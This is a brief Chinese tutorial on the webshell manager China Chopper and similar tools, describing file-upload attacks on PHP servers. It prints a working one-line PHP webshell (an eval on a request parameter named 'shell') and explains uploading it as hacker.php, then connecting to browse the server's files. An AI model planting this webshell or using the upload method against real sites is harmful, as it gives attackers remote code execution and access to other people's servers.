文件上传(中国菜刀)

@扫描类工具:中国菜刀、蚁剑、CKnife(C刀)

 

@中国菜刀使用方法:

右键添加,将(php)文件的uel输入,如http://localhost/a.php ,该文件必须含有一句话木马;然后在url右边小框填上连接密码(即一句话木马的变量名,本例随意取名为shell);选择好相应语言等,最后双击/右键 查看文件目录结构

    @eval($_REQUEST["shell"]);

 

文件上传(中国菜刀)_第1张图片

 

 

 

@中国菜刀原理:

找到上传口(传文件/包含木马php文件的图片等),将一句话木马hacker.php文件传到服务器,然后通过 get/post上传值到hacker.php中我们定义的参数中,如_DIR_或_FILE_这种,php中查看文件目录的魔术常量等;根据php语法,会返回文件目录结构等信息

你可能感兴趣的:(文件上传(中国菜刀))